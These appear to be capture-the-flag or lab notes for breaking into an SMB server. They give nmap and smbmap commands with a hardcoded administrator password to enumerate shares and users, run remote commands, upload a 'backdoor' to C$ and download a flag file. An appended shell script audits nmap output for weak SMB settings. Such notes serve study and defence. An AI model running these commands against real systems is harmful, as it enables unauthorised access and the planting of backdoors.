First we run an nmap scan:
nmap 192.168.18.47
- We run a more detailed nmap scan (the glob is quoted so the shell does not expand it against local files):
nmap -p445 --script "smb*" 192.168.18.47
- We use smbmap:
smbmap -u guest -p "" -d . -H 192.168.18.47
- Now as administrator:
smbmap -u administrator -p Temporal.23! -d . -H 192.168.18.47
- We execute commands:
smbmap -u administrator -p Temporal.23! -H 192.168.18.47 -x whoami
smbmap -u administrator -p Temporal.23! -H 192.168.18.47 -x "ping 192.168.18.30"
tcpdump -nvi enp0s5 icmp
- List drives:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! -L
- List the contents of a drive:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! -r C$
- Upload a backdoor:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! --upload "./backdoor" "C$\backdoor"
- We download the flag:
smbmap -H 192.168.18.47 -u administrator -p Temporal.23! --download "C$\flag.txt"
nmap 192.168.18.47
nmap -p445 --script smb-protocols 192.168.18.47
nmap -p445 --script smb-security-mode 192.168.18.47
nmap -p445 --script smb-enum-sessions 192.168.18.47
nmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-enum-shares 192.168.18.47
nmap -p445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=Temporal.23! 192.168.18.47
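
The smb-protocols and smb-security-mode scans above report the server settings a defender would harden. As an added example (not part of the original notes), this shell function reads saved nmap output and flags an offered SMBv1 dialect, guest logon and non-required signing. The function names and the sample output are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: triage saved output of
#   nmap -p445 --script smb-protocols,smb-security-mode <host>
# audit_smb_output and sample_scan are hypothetical helper names.

audit_smb_output() {
    # Reads nmap normal output on stdin, prints one finding per line.
    awk '
        # Remember which host the following script results belong to.
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }

        # smb-protocols reports SMBv1 as the "NT LM 0.12" dialect.
        /SMBv1/ { print host ": SMBv1 dialect offered -> disable SMB1" }

        # smb-security-mode fields, e.g. "|_  message_signing: disabled (...)".
        /(account_used|authentication_level|challenge_response|message_signing): / {
            line = $0
            sub(/^[|_ ]+/, "", line)          # drop the output tree prefix
            split(line, kv, ": ")
            key = kv[1]
            split(kv[2], w, " "); val = w[1]  # first word of the value
            if (key == "account_used" && val == "guest")
                print host ": scan logged on as guest -> disable guest access"
            if (key == "authentication_level" && val != "user")
                print host ": authentication_level is " val " -> use user-level auth"
            if (key == "challenge_response" && val != "supported")
                print host ": challenge_response is " val " -> refuse plaintext logons"
            if (key == "message_signing" && val != "required")
                print host ": message_signing is " val " -> require SMB signing"
        }
    '
}

# Constructed sample output (not captured from the lab host on this page).
sample_scan() {
    cat <<'EOF'
Nmap scan report for 192.168.18.47
Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|_    3.11
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
EOF
}

sample_scan | audit_smb_output
```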